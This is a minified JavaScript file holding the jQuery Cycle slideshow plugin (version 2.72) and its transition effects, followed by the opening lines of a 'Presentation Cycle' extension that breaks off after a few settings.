
/*
 * jQuery Cycle Plugin (with Transition Definitions)
 * Examples and documentation at: http://jquery.malsup.com/cycle/
 * Copyright (c) 2007-2009 M. Alsup
 * Version: 2.72 (09-SEP-2009)
 * Dual licensed under the MIT and GPL licenses:
 * http://www.opensource.org/licenses/mit-license.php
 * http://www.gnu.org/licenses/gpl.html
 * Requires: jQuery v1.2.6 or later
 *
 * Originally based on the work of:
 *	1) Matt Oakes
 *	2) Torsten Baldes (http://medienfreunde.com/lab/innerfade/)
 *	3) Benjamin Sterling (http://www.benjaminsterling.com/experiments/jqShuffle/)
 */
(function($){var ver="2.72";if($.support==undefined){$.support={opacity:!($.browser.msie)};}function debug(s){if($.fn.cycle.debug){log(s);}}function log(){if(window.console&&window.console.log){window.console.log("[cycle] "+Array.prototype.join.call(arguments," "));}}$.fn.cycle=function(options,arg2){var o={s:this.selector,c:this.context};if(this.length===0&&options!="stop"){if(!$.isReady&&o.s){log("DOM not ready, queuing slideshow");$(function(){$(o.s,o.c).cycle(options,arg2);});return this;}log("terminating; zero elements found by selector"+($.isReady?"":" (DOM not ready)"));return this;}return this.each(function(){var opts=handleArguments(this,options,arg2);if(opts===false){return;}if(this.cycleTimeout){clearTimeout(this.cycleTimeout);}this.cycleTimeout=this.cyclePause=0;var $cont=$(this);var $slides=opts.slideExpr?$(opts.slideExpr,this):$cont.children();var els=$slides.get();if(els.length<2){log("terminating; too few slides: "+els.length);return;}var opts2=buildOptions($cont,$slides,els,opts,o);if(opts2===false){return;}var startTime=opts2.continuous?10:getTimeout(opts2.currSlide,opts2.nextSlide,opts2,!opts2.rev);if(startTime){startTime+=(opts2.delay||0);if(startTime<10){startTime=10;}debug("first timeout: "+startTime);this.cycleTimeout=setTimeout(function(){go(els,opts2,0,!opts2.rev);},startTime);}});};function handleArguments(cont,options,arg2){if(cont.cycleStop==undefined){cont.cycleStop=0;}if(options===undefined||options===null){options={};}if(options.constructor==String){switch(options){case"stop":cont.cycleStop++;if(cont.cycleTimeout){clearTimeout(cont.cycleTimeout);}cont.cycleTimeout=0;$(cont).removeData("cycle.opts");return false;case"pause":cont.cyclePause=1;return false;case"resume":cont.cyclePause=0;if(arg2===true){options=$(cont).data("cycle.opts");if(!options){log("options not found, can not resume");return false;}if(cont.cycleTimeout){clearTimeout(cont.cycleTimeout);cont.cycleTimeout=0;}go(options.elements,options,1,1);}return false;case"prev":case"next":var opts=$(cont).data("cycle.opts");if(!opts){log('options not found, "prev/next" ignored');return false;}$.fn.cycle[options](opts);return false;default:options={fx:options};}return options;}else{if(options.constructor==Number){var num=options;options=$(cont).data("cycle.opts");if(!options){log("options not found, can not advance slide");return false;}if(num<0||num>=options.elements.length){log("invalid slide index: "+num);return false;}options.nextSlide=num;if(cont.cycleTimeout){clearTimeout(cont.cycleTimeout);cont.cycleTimeout=0;}if(typeof arg2=="string"){options.oneTimeFx=arg2;}go(options.elements,options,1,num>=options.currSlide);return false;}}return options;}function removeFilter(el,opts){if(!$.support.opacity&&opts.cleartype&&el.style.filter){try{el.style.removeAttribute("filter");}catch(smother){}}}function buildOptions($cont,$slides,els,options,o){var opts=$.extend({},$.fn.cycle.defaults,options||{},$.metadata?$cont.metadata():$.meta?$cont.data():{});if(opts.autostop){opts.countdown=opts.autostopCount||els.length;}var cont=$cont[0];$cont.data("cycle.opts",opts);opts.$cont=$cont;opts.stopCount=cont.cycleStop;opts.elements=els;opts.before=opts.before?[opts.before]:[];opts.after=opts.after?[opts.after]:[];opts.after.unshift(function(){opts.busy=0;});if(!$.support.opacity&&opts.cleartype){opts.after.push(function(){removeFilter(this,opts);});}if(opts.continuous){opts.after.push(function(){go(els,opts,0,!opts.rev);});}saveOriginalOpts(opts);if(!$.support.opacity&&opts.cleartype&&!opts.cleartypeNoBg){clearTypeFix($slides);}if($cont.css("position")=="static"){$cont.css("position","relative");}if(opts.width){$cont.width(opts.width);}if(opts.height&&opts.height!="auto"){$cont.height(opts.height);}if(opts.startingSlide){opts.startingSlide=parseInt(opts.startingSlide);}if(opts.random){opts.randomMap=[];for(var i=0;i<els.length;i++){opts.randomMap.push(i);}opts.randomMap.sort(function(a,b){return Math.random()-0.5;});opts.randomIndex=0;opts.startingSlide=opts.randomMap[0];}else{if(opts.startingSlide>=els.length){opts.startingSlide=0;}}opts.currSlide=opts.startingSlide=opts.startingSlide||0;var first=opts.startingSlide;$slides.css({position:"absolute",top:0,left:0}).hide().each(function(i){var z=first?i>=first?els.length-(i-first):first-i:els.length-i;$(this).css("z-index",z);});$(els[first]).css("opacity",1).show();removeFilter(els[first],opts);if(opts.fit&&opts.width){$slides.width(opts.width);}if(opts.fit&&opts.height&&opts.height!="auto"){$slides.height(opts.height);}var reshape=opts.containerResize&&!$cont.innerHeight();if(reshape){var maxw=0,maxh=0;for(var j=0;j<els.length;j++){var $e=$(els[j]),e=$e[0],w=$e.outerWidth(),h=$e.outerHeight();if(!w){w=e.offsetWidth;}if(!h){h=e.offsetHeight;}maxw=w>maxw?w:maxw;maxh=h>maxh?h:maxh;}if(maxw>0&&maxh>0){$cont.css({width:maxw+"px",height:maxh+"px"});}}if(opts.pause){$cont.hover(function(){this.cyclePause++;},function(){this.cyclePause--;});}if(supportMultiTransitions(opts)===false){return false;}var requeue=false;options.requeueAttempts=options.requeueAttempts||0;$slides.each(function(){var $el=$(this);this.cycleH=(opts.fit&&opts.height)?opts.height:$el.height();this.cycleW=(opts.fit&&opts.width)?opts.width:$el.width();if($el.is("img")){var loadingIE=($.browser.msie&&this.cycleW==28&&this.cycleH==30&&!this.complete);var loadingFF=($.browser.mozilla&&this.cycleW==34&&this.cycleH==19&&!this.complete);var loadingOp=($.browser.opera&&((this.cycleW==42&&this.cycleH==19)||(this.cycleW==37&&this.cycleH==17))&&!this.complete);var loadingOther=(this.cycleH==0&&this.cycleW==0&&!this.complete);if(loadingIE||loadingFF||loadingOp||loadingOther){if(o.s&&opts.requeueOnImageNotLoaded&&++options.requeueAttempts<100){log(options.requeueAttempts," - img slide not loaded, requeuing slideshow: ",this.src,this.cycleW,this.cycleH);setTimeout(function(){$(o.s,o.c).cycle(options);},opts.requeueTimeout);requeue=true;return false;}else{log("could not determine size of image: "+this.src,this.cycleW,this.cycleH);}}}return true;});if(requeue){return false;}opts.cssBefore=opts.cssBefore||{};opts.animIn=opts.animIn||{};opts.animOut=opts.animOut||{};$slides.not(":eq("+first+")").css(opts.cssBefore);if(opts.cssFirst){$($slides[first]).css(opts.cssFirst);}if(opts.timeout){opts.timeout=parseInt(opts.timeout);if(opts.speed.constructor==String){opts.speed=$.fx.speeds[opts.speed]||parseInt(opts.speed);}if(!opts.sync){opts.speed=opts.speed/2;}while((opts.timeout-opts.speed)<250){opts.timeout+=opts.speed;}}if(opts.easing){opts.easeIn=opts.easeOut=opts.easing;}if(!opts.speedIn){opts.speedIn=opts.speed;}if(!opts.speedOut){opts.speedOut=opts.speed;}opts.slideCount=els.length;opts.currSlide=opts.lastSlide=first;if(opts.random){opts.nextSlide=opts.currSlide;if(++opts.randomIndex==els.length){opts.randomIndex=0;}opts.nextSlide=opts.randomMap[opts.randomIndex];}else{opts.nextSlide=opts.startingSlide>=(els.length-1)?0:opts.startingSlide+1;}if(!opts.multiFx){var init=$.fn.cycle.transitions[opts.fx];if($.isFunction(init)){init($cont,$slides,opts);}else{if(opts.fx!="custom"&&!opts.multiFx){log("unknown transition: "+opts.fx,"; slideshow terminating");return false;}}}var e0=$slides[first];if(opts.before.length){opts.before[0].apply(e0,[e0,e0,opts,true]);}if(opts.after.length>1){opts.after[1].apply(e0,[e0,e0,opts,true]);}if(opts.next){$(opts.next).bind(opts.prevNextEvent,function(){return advance(opts,opts.rev?-1:1);});}if(opts.prev){$(opts.prev).bind(opts.prevNextEvent,function(){return advance(opts,opts.rev?1:-1);});}if(opts.pager){buildPager(els,opts);}exposeAddSlide(opts,els);return opts;}function saveOriginalOpts(opts){opts.original={before:[],after:[]};opts.original.cssBefore=$.extend({},opts.cssBefore);opts.original.cssAfter=$.extend({},opts.cssAfter);opts.original.animIn=$.extend({},opts.animIn);opts.original.animOut=$.extend({},opts.animOut);$.each(opts.before,function(){opts.original.before.push(this);});$.each(opts.after,function(){opts.original.after.push(this);});}function supportMultiTransitions(opts){var i,tx,txs=$.fn.cycle.transitions;if(opts.fx.indexOf(",")>0){opts.multiFx=true;opts.fxs=opts.fx.replace(/\s*/g,"").split(",");for(i=0;i<opts.fxs.length;i++){var fx=opts.fxs[i];tx=txs[fx];if(!tx||!txs.hasOwnProperty(fx)||!$.isFunction(tx)){log("discarding unknown transition: ",fx);opts.fxs.splice(i,1);i--;}}if(!opts.fxs.length){log("No valid transitions named; slideshow terminating.");return false;}}else{if(opts.fx=="all"){opts.multiFx=true;opts.fxs=[];for(p in txs){tx=txs[p];if(txs.hasOwnProperty(p)&&$.isFunction(tx)){opts.fxs.push(p);}}}}if(opts.multiFx&&opts.randomizeEffects){var r1=Math.floor(Math.random()*20)+30;for(i=0;i<r1;i++){var r2=Math.floor(Math.random()*opts.fxs.length);opts.fxs.push(opts.fxs.splice(r2,1)[0]);}debug("randomized fx sequence: ",opts.fxs);}return true;}function exposeAddSlide(opts,els){opts.addSlide=function(newSlide,prepend){var $s=$(newSlide),s=$s[0];if(!opts.autostopCount){opts.countdown++;}els[prepend?"unshift":"push"](s);if(opts.els){opts.els[prepend?"unshift":"push"](s);}opts.slideCount=els.length;$s.css("position","absolute");$s[prepend?"prependTo":"appendTo"](opts.$cont);if(prepend){opts.currSlide++;opts.nextSlide++;}if(!$.support.opacity&&opts.cleartype&&!opts.cleartypeNoBg){clearTypeFix($s);}if(opts.fit&&opts.width){$s.width(opts.width);}if(opts.fit&&opts.height&&opts.height!="auto"){$slides.height(opts.height);}s.cycleH=(opts.fit&&opts.height)?opts.height:$s.height();s.cycleW=(opts.fit&&opts.width)?opts.width:$s.width();$s.css(opts.cssBefore);if(opts.pager){$.fn.cycle.createPagerAnchor(els.length-1,s,$(opts.pager),els,opts);}if($.isFunction(opts.onAddSlide)){opts.onAddSlide($s);}else{$s.hide();}};}$.fn.cycle.resetState=function(opts,fx){fx=fx||opts.fx;opts.before=[];opts.after=[];opts.cssBefore=$.extend({},opts.original.cssBefore);opts.cssAfter=$.extend({},opts.original.cssAfter);opts.animIn=$.extend({},opts.original.animIn);opts.animOut=$.extend({},opts.original.animOut);opts.fxFn=null;$.each(opts.original.before,function(){opts.before.push(this);});$.each(opts.original.after,function(){opts.after.push(this);});var init=$.fn.cycle.transitions[fx];if($.isFunction(init)){init(opts.$cont,$(opts.elements),opts);}};function go(els,opts,manual,fwd){if(manual&&opts.busy&&opts.manualTrump){$(els).stop(true,true);opts.busy=false;}if(opts.busy){return;}var p=opts.$cont[0],curr=els[opts.currSlide],next=els[opts.nextSlide];if(p.cycleStop!=opts.stopCount||p.cycleTimeout===0&&!manual){return;}if(!manual&&!p.cyclePause&&((opts.autostop&&(--opts.countdown<=0))||(opts.nowrap&&!opts.random&&opts.nextSlide<opts.currSlide))){if(opts.end){opts.end(opts);}return;}if(manual||!p.cyclePause){var fx=opts.fx;curr.cycleH=curr.cycleH||$(curr).height();curr.cycleW=curr.cycleW||$(curr).width();next.cycleH=next.cycleH||$(next).height();next.cycleW=next.cycleW||$(next).width();if(opts.multiFx){if(opts.lastFx==undefined||++opts.lastFx>=opts.fxs.length){opts.lastFx=0;}fx=opts.fxs[opts.lastFx];opts.currFx=fx;}if(opts.oneTimeFx){fx=opts.oneTimeFx;opts.oneTimeFx=null;}$.fn.cycle.resetState(opts,fx);if(opts.before.length){$.each(opts.before,function(i,o){if(p.cycleStop!=opts.stopCount){return;}o.apply(next,[curr,next,opts,fwd]);});}var after=function(){$.each(opts.after,function(i,o){if(p.cycleStop!=opts.stopCount){return;}o.apply(next,[curr,next,opts,fwd]);});};if(opts.nextSlide!=opts.currSlide){opts.busy=1;if(opts.fxFn){opts.fxFn(curr,next,opts,after,fwd);}else{if($.isFunction($.fn.cycle[opts.fx])){$.fn.cycle[opts.fx](curr,next,opts,after);}else{$.fn.cycle.custom(curr,next,opts,after,manual&&opts.fastOnEvent);}}}opts.lastSlide=opts.currSlide;if(opts.random){opts.currSlide=opts.nextSlide;if(++opts.randomIndex==els.length){opts.randomIndex=0;}opts.nextSlide=opts.randomMap[opts.randomIndex];}else{var roll=(opts.nextSlide+1)==els.length;opts.nextSlide=roll?0:opts.nextSlide+1;opts.currSlide=roll?els.length-1:opts.nextSlide-1;}if(opts.pager){$.fn.cycle.updateActivePagerLink(opts.pager,opts.currSlide);}}var ms=0;if(opts.timeout&&!opts.continuous){ms=getTimeout(curr,next,opts,fwd);}else{if(opts.continuous&&p.cyclePause){ms=10;}}if(ms>0){p.cycleTimeout=setTimeout(function(){go(els,opts,0,!opts.rev);},ms);}}$.fn.cycle.updateActivePagerLink=function(pager,currSlide){$(pager).find("a").removeClass("activeSlide").filter("a:eq("+currSlide+")").addClass("activeSlide");};function getTimeout(curr,next,opts,fwd){if(opts.timeoutFn){var t=opts.timeoutFn(curr,next,opts,fwd);while((t-opts.speed)<250){t+=opts.speed;}debug("calculated timeout: "+t+"; speed: "+opts.speed);if(t!==false){return t;}}return opts.timeout;}$.fn.cycle.next=function(opts){advance(opts,opts.rev?-1:1);};$.fn.cycle.prev=function(opts){advance(opts,opts.rev?1:-1);};function advance(opts,val){var els=opts.elements;var p=opts.$cont[0],timeout=p.cycleTimeout;if(timeout){clearTimeout(timeout);p.cycleTimeout=0;}if(opts.random&&val<0){opts.randomIndex--;if(--opts.randomIndex==-2){opts.randomIndex=els.length-2;}else{if(opts.randomIndex==-1){opts.randomIndex=els.length-1;}}opts.nextSlide=opts.randomMap[opts.randomIndex];}else{if(opts.random){if(++opts.randomIndex==els.length){opts.randomIndex=0;}opts.nextSlide=opts.randomMap[opts.randomIndex];}else{opts.nextSlide=opts.currSlide+val;if(opts.nextSlide<0){if(opts.nowrap){return false;}opts.nextSlide=els.length-1;}else{if(opts.nextSlide>=els.length){if(opts.nowrap){return false;}opts.nextSlide=0;}}}}if($.isFunction(opts.prevNextClick)){opts.prevNextClick(val>0,opts.nextSlide,els[opts.nextSlide]);}go(els,opts,1,val>=0);return false;}function buildPager(els,opts){var $p=$(opts.pager);$.each(els,function(i,o){$.fn.cycle.createPagerAnchor(i,o,$p,els,opts);});$.fn.cycle.updateActivePagerLink(opts.pager,opts.startingSlide);}$.fn.cycle.createPagerAnchor=function(i,el,$p,els,opts){var a;if($.isFunction(opts.pagerAnchorBuilder)){a=opts.pagerAnchorBuilder(i,el);}else{a='<a href="#">'+(i+1)+"</a>";}if(!a){return;}var $a=$(a);if($a.parents("body").length===0){var arr=[];if($p.length>1){$p.each(function(){var $clone=$a.clone(true);$(this).append($clone);arr.push($clone);});$a=$(arr);}else{$a.appendTo($p);}}$a.bind(opts.pagerEvent,function(e){e.preventDefault();opts.nextSlide=i;var p=opts.$cont[0],timeout=p.cycleTimeout;if(timeout){clearTimeout(timeout);p.cycleTimeout=0;}if($.isFunction(opts.pagerClick)){opts.pagerClick(opts.nextSlide,els[opts.nextSlide]);}go(els,opts,1,opts.currSlide<i);return false;});if(opts.pagerEvent!="click"){$a.click(function(){return false;});}if(opts.pauseOnPagerHover){$a.hover(function(){opts.$cont[0].cyclePause++;},function(){opts.$cont[0].cyclePause--;});}};$.fn.cycle.hopsFromLast=function(opts,fwd){var hops,l=opts.lastSlide,c=opts.currSlide;if(fwd){hops=c>l?c-l:opts.slideCount-l;}else{hops=c<l?l-c:l+opts.slideCount-c;}return hops;};function clearTypeFix($slides){function hex(s){s=parseInt(s).toString(16);return s.length<2?"0"+s:s;}function getBg(e){for(;e&&e.nodeName.toLowerCase()!="html";e=e.parentNode){var v=$.css(e,"background-color");if(v.indexOf("rgb")>=0){var rgb=v.match(/\d+/g);return"#"+hex(rgb[0])+hex(rgb[1])+hex(rgb[2]);}if(v&&v!="transparent"){return v;}}return"";}$slides.each(function(){$(this).css("background-color",getBg(this));});}$.fn.cycle.commonReset=function(curr,next,opts,w,h,rev){$(opts.elements).not(curr).hide();opts.cssBefore.opacity=1;opts.cssBefore.display="block";if(w!==false&&next.cycleW>0){opts.cssBefore.width=next.cycleW;}if(h!==false&&next.cycleH>0){opts.cssBefore.height=next.cycleH;}opts.cssAfter=opts.cssAfter||{};opts.cssAfter.display="none";$(curr).css("zIndex",opts.slideCount+(rev===true?1:0));$(next).css("zIndex",opts.slideCount+(rev===true?0:1));};$.fn.cycle.custom=function(curr,next,opts,cb,speedOverride){var $l=$(curr),$n=$(next);var speedIn=opts.speedIn,speedOut=opts.speedOut,easeIn=opts.easeIn,easeOut=opts.easeOut;$n.css(opts.cssBefore);if(speedOverride){if(typeof speedOverride=="number"){speedIn=speedOut=speedOverride;}else{speedIn=speedOut=1;}easeIn=easeOut=null;}var fn=function(){$n.animate(opts.animIn,speedIn,easeIn,cb);};$l.animate(opts.animOut,speedOut,easeOut,function(){if(opts.cssAfter){$l.css(opts.cssAfter);}if(!opts.sync){fn();}});if(opts.sync){fn();}};$.fn.cycle.transitions={fade:function($cont,$slides,opts){$slides.not(":eq("+opts.currSlide+")").css("opacity",0);opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts);opts.cssBefore.opacity=0;});opts.animIn={opacity:1};opts.animOut={opacity:0};opts.cssBefore={top:0,left:0};}};$.fn.cycle.ver=function(){return ver;};$.fn.cycle.defaults={fx:"fade",timeout:4000,timeoutFn:null,continuous:0,speed:1000,speedIn:null,speedOut:null,next:null,prev:null,prevNextClick:null,prevNextEvent:"click",pager:null,pagerClick:null,pagerEvent:"click",pagerAnchorBuilder:null,before:null,after:null,end:null,easing:null,easeIn:null,easeOut:null,shuffle:null,animIn:null,animOut:null,cssBefore:null,cssAfter:null,fxFn:null,height:"auto",startingSlide:0,sync:1,random:0,fit:0,containerResize:1,pause:0,pauseOnPagerHover:0,autostop:0,autostopCount:0,delay:0,slideExpr:null,cleartype:!$.support.opacity,cleartypeNoBg:false,nowrap:0,fastOnEvent:0,randomizeEffects:1,rev:0,manualTrump:true,requeueOnImageNotLoaded:true,requeueTimeout:250};})(jQuery);
/*
 * jQuery Cycle Plugin Transition Definitions
 * This script is a plugin for the jQuery Cycle Plugin
 * Examples and documentation at: http://malsup.com/jquery/cycle/
 * Copyright (c) 2007-2008 M. Alsup
 * Version:	 2.72
 * Dual licensed under the MIT and GPL licenses:
 * http://www.opensource.org/licenses/mit-license.php
 * http://www.gnu.org/licenses/gpl.html
 */
(function($){$.fn.cycle.transitions.none=function($cont,$slides,opts){opts.fxFn=function(curr,next,opts,after){$(next).show();$(curr).hide();after();};};$.fn.cycle.transitions.scrollUp=function($cont,$slides,opts){$cont.css("overflow","hidden");opts.before.push($.fn.cycle.commonReset);var h=$cont.height();opts.cssBefore={top:h,left:0};opts.cssFirst={top:0};opts.animIn={top:0};opts.animOut={top:-h};};$.fn.cycle.transitions.scrollDown=function($cont,$slides,opts){$cont.css("overflow","hidden");opts.before.push($.fn.cycle.commonReset);var h=$cont.height();opts.cssFirst={top:0};opts.cssBefore={top:-h,left:0};opts.animIn={top:0};opts.animOut={top:h};};$.fn.cycle.transitions.scrollLeft=function($cont,$slides,opts){$cont.css("overflow","hidden");opts.before.push($.fn.cycle.commonReset);var w=$cont.width();opts.cssFirst={left:0};opts.cssBefore={left:w,top:0};opts.animIn={left:0};opts.animOut={left:0-w};};$.fn.cycle.transitions.scrollRight=function($cont,$slides,opts){$cont.css("overflow","hidden");opts.before.push($.fn.cycle.commonReset);var w=$cont.width();opts.cssFirst={left:0};opts.cssBefore={left:-w,top:0};opts.animIn={left:0};opts.animOut={left:w};};$.fn.cycle.transitions.scrollHorz=function($cont,$slides,opts){$cont.css("overflow","hidden").width();opts.before.push(function(curr,next,opts,fwd){$.fn.cycle.commonReset(curr,next,opts);opts.cssBefore.left=fwd?(next.cycleW-1):(1-next.cycleW);opts.animOut.left=fwd?-curr.cycleW:curr.cycleW;});opts.cssFirst={left:0};opts.cssBefore={top:0};opts.animIn={left:0};opts.animOut={top:0};};$.fn.cycle.transitions.scrollVert=function($cont,$slides,opts){$cont.css("overflow","hidden");opts.before.push(function(curr,next,opts,fwd){$.fn.cycle.commonReset(curr,next,opts);opts.cssBefore.top=fwd?(1-next.cycleH):(next.cycleH-1);opts.animOut.top=fwd?curr.cycleH:-curr.cycleH;});opts.cssFirst={top:0};opts.cssBefore={left:0};opts.animIn={top:0};opts.animOut={left:0};};$.fn.cycle.transitions.slideX=function($cont,$slides,opts){opts.before.push(function(curr,next,opts){$(opts.elements).not(curr).hide();$.fn.cycle.commonReset(curr,next,opts,false,true);opts.animIn.width=next.cycleW;});opts.cssBefore={left:0,top:0,width:0};opts.animIn={width:"show"};opts.animOut={width:0};};$.fn.cycle.transitions.slideY=function($cont,$slides,opts){opts.before.push(function(curr,next,opts){$(opts.elements).not(curr).hide();$.fn.cycle.commonReset(curr,next,opts,true,false);opts.animIn.height=next.cycleH;});opts.cssBefore={left:0,top:0,height:0};opts.animIn={height:"show"};opts.animOut={height:0};};$.fn.cycle.transitions.shuffle=function($cont,$slides,opts){var i,w=$cont.css("overflow","visible").width();$slides.css({left:0,top:0});opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts,true,true,true);});if(!opts.speedAdjusted){opts.speed=opts.speed/2;opts.speedAdjusted=true;}opts.random=0;opts.shuffle=opts.shuffle||{left:-w,top:15};opts.els=[];for(i=0;i<$slides.length;i++){opts.els.push($slides[i]);}for(i=0;i<opts.currSlide;i++){opts.els.push(opts.els.shift());}opts.fxFn=function(curr,next,opts,cb,fwd){var $el=fwd?$(curr):$(next);$(next).css(opts.cssBefore);var count=opts.slideCount;$el.animate(opts.shuffle,opts.speedIn,opts.easeIn,function(){var hops=$.fn.cycle.hopsFromLast(opts,fwd);for(var k=0;k<hops;k++){fwd?opts.els.push(opts.els.shift()):opts.els.unshift(opts.els.pop());}if(fwd){for(var i=0,len=opts.els.length;i<len;i++){$(opts.els[i]).css("z-index",len-i+count);}}else{var z=$(curr).css("z-index");$el.css("z-index",parseInt(z)+1+count);}$el.animate({left:0,top:0},opts.speedOut,opts.easeOut,function(){$(fwd?this:curr).hide();if(cb){cb();}});});};opts.cssBefore={display:"block",opacity:1,top:0,left:0};};$.fn.cycle.transitions.turnUp=function($cont,$slides,opts){opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts,true,false);opts.cssBefore.top=next.cycleH;opts.animIn.height=next.cycleH;});opts.cssFirst={top:0};opts.cssBefore={left:0,height:0};opts.animIn={top:0};opts.animOut={height:0};};$.fn.cycle.transitions.turnDown=function($cont,$slides,opts){opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts,true,false);opts.animIn.height=next.cycleH;opts.animOut.top=curr.cycleH;});opts.cssFirst={top:0};opts.cssBefore={left:0,top:0,height:0};opts.animOut={height:0};};$.fn.cycle.transitions.turnLeft=function($cont,$slides,opts){opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts,false,true);opts.cssBefore.left=next.cycleW;opts.animIn.width=next.cycleW;});opts.cssBefore={top:0,width:0};opts.animIn={left:0};opts.animOut={width:0};};$.fn.cycle.transitions.turnRight=function($cont,$slides,opts){opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts,false,true);opts.animIn.width=next.cycleW;opts.animOut.left=curr.cycleW;});opts.cssBefore={top:0,left:0,width:0};opts.animIn={left:0};opts.animOut={width:0};};$.fn.cycle.transitions.zoom=function($cont,$slides,opts){opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts,false,false,true);opts.cssBefore.top=next.cycleH/2;opts.cssBefore.left=next.cycleW/2;opts.animIn={top:0,left:0,width:next.cycleW,height:next.cycleH};opts.animOut={width:0,height:0,top:curr.cycleH/2,left:curr.cycleW/2};});opts.cssFirst={top:0,left:0};opts.cssBefore={width:0,height:0};};$.fn.cycle.transitions.fadeZoom=function($cont,$slides,opts){opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts,false,false);opts.cssBefore.left=next.cycleW/2;opts.cssBefore.top=next.cycleH/2;opts.animIn={top:0,left:0,width:next.cycleW,height:next.cycleH};});opts.cssBefore={width:0,height:0};opts.animOut={opacity:0};};$.fn.cycle.transitions.blindX=function($cont,$slides,opts){var w=$cont.css("overflow","hidden").width();opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts);opts.animIn.width=next.cycleW;opts.animOut.left=curr.cycleW;});opts.cssBefore={left:w,top:0};opts.animIn={left:0};opts.animOut={left:w};};$.fn.cycle.transitions.blindY=function($cont,$slides,opts){var h=$cont.css("overflow","hidden").height();opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts);opts.animIn.height=next.cycleH;opts.animOut.top=curr.cycleH;});opts.cssBefore={top:h,left:0};opts.animIn={top:0};opts.animOut={top:h};};$.fn.cycle.transitions.blindZ=function($cont,$slides,opts){var h=$cont.css("overflow","hidden").height();var w=$cont.width();opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts);opts.animIn.height=next.cycleH;opts.animOut.top=curr.cycleH;});opts.cssBefore={top:h,left:w};opts.animIn={top:0,left:0};opts.animOut={top:h,left:w};};$.fn.cycle.transitions.growX=function($cont,$slides,opts){opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts,false,true);opts.cssBefore.left=this.cycleW/2;opts.animIn={left:0,width:this.cycleW};opts.animOut={left:0};});opts.cssBefore={width:0,top:0};};$.fn.cycle.transitions.growY=function($cont,$slides,opts){opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts,true,false);opts.cssBefore.top=this.cycleH/2;opts.animIn={top:0,height:this.cycleH};opts.animOut={top:0};});opts.cssBefore={height:0,left:0};};$.fn.cycle.transitions.curtainX=function($cont,$slides,opts){opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts,false,true,true);opts.cssBefore.left=next.cycleW/2;opts.animIn={left:0,width:this.cycleW};opts.animOut={left:curr.cycleW/2,width:0};});opts.cssBefore={top:0,width:0};};$.fn.cycle.transitions.curtainY=function($cont,$slides,opts){opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts,true,false,true);opts.cssBefore.top=next.cycleH/2;opts.animIn={top:0,height:next.cycleH};opts.animOut={top:curr.cycleH/2,height:0};});opts.cssBefore={left:0,height:0};};$.fn.cycle.transitions.cover=function($cont,$slides,opts){var d=opts.direction||"left";var w=$cont.css("overflow","hidden").width();var h=$cont.height();opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts);if(d=="right"){opts.cssBefore.left=-w;}else{if(d=="up"){opts.cssBefore.top=h;}else{if(d=="down"){opts.cssBefore.top=-h;}else{opts.cssBefore.left=w;}}}});opts.animIn={left:0,top:0};opts.animOut={opacity:1};opts.cssBefore={top:0,left:0};};$.fn.cycle.transitions.uncover=function($cont,$slides,opts){var d=opts.direction||"left";var w=$cont.css("overflow","hidden").width();var h=$cont.height();opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts,true,true,true);if(d=="right"){opts.animOut.left=w;}else{if(d=="up"){opts.animOut.top=-h;}else{if(d=="down"){opts.animOut.top=h;}else{opts.animOut.left=-w;}}}});opts.animIn={left:0,top:0};opts.animOut={opacity:1};opts.cssBefore={top:0,left:0};};$.fn.cycle.transitions.toss=function($cont,$slides,opts){var w=$cont.css("overflow","visible").width();var h=$cont.height();opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts,true,true,true);if(!opts.animOut.left&&!opts.animOut.top){opts.animOut={left:w*2,top:-h/2,opacity:0};}else{opts.animOut.opacity=0;}});opts.cssBefore={left:0,top:0};opts.animIn={left:0};};$.fn.cycle.transitions.wipe=function($cont,$slides,opts){var w=$cont.css("overflow","hidden").width();var h=$cont.height();opts.cssBefore=opts.cssBefore||{};var clip;if(opts.clip){if(/l2r/.test(opts.clip)){clip="rect(0px 0px "+h+"px 0px)";}else{if(/r2l/.test(opts.clip)){clip="rect(0px "+w+"px "+h+"px "+w+"px)";}else{if(/t2b/.test(opts.clip)){clip="rect(0px "+w+"px 0px 0px)";}else{if(/b2t/.test(opts.clip)){clip="rect("+h+"px "+w+"px "+h+"px 0px)";}else{if(/zoom/.test(opts.clip)){var top=parseInt(h/2);var left=parseInt(w/2);clip="rect("+top+"px "+left+"px "+top+"px "+left+"px)";}}}}}}opts.cssBefore.clip=opts.cssBefore.clip||clip||"rect(0px 0px 0px 0px)";var d=opts.cssBefore.clip.match(/(\d+)/g);var t=parseInt(d[0]),r=parseInt(d[1]),b=parseInt(d[2]),l=parseInt(d[3]);opts.before.push(function(curr,next,opts){if(curr==next){return;}var $curr=$(curr),$next=$(next);$.fn.cycle.commonReset(curr,next,opts,true,true,false);opts.cssAfter.display="block";var step=1,count=parseInt((opts.speedIn/13))-1;(function f(){var tt=t?t-parseInt(step*(t/count)):0;var ll=l?l-parseInt(step*(l/count)):0;var bb=b<h?b+parseInt(step*((h-b)/count||1)):h;var rr=r<w?r+parseInt(step*((w-r)/count||1)):w;$next.css({clip:"rect("+tt+"px "+rr+"px "+bb+"px "+ll+"px)"});(step++<=count)?setTimeout(f,13):$curr.css("display","none");})();});opts.cssBefore={display:"block",opacity:1,top:0,left:0};opts.animIn={left:0};opts.animOut={left:0};};})(jQuery);

var presentationCycle = {
    
    /*
     * Presentation Cycle - a jQuery Cycle extension
     * Author:  Gaya Kessler
     * URL:     http://www.gayadesign.com
     * Date:	03-11-09
     */
    
    //slide options
    slideTimeout: 8000,
    containerId: "featured-list",
    
    //cycle options
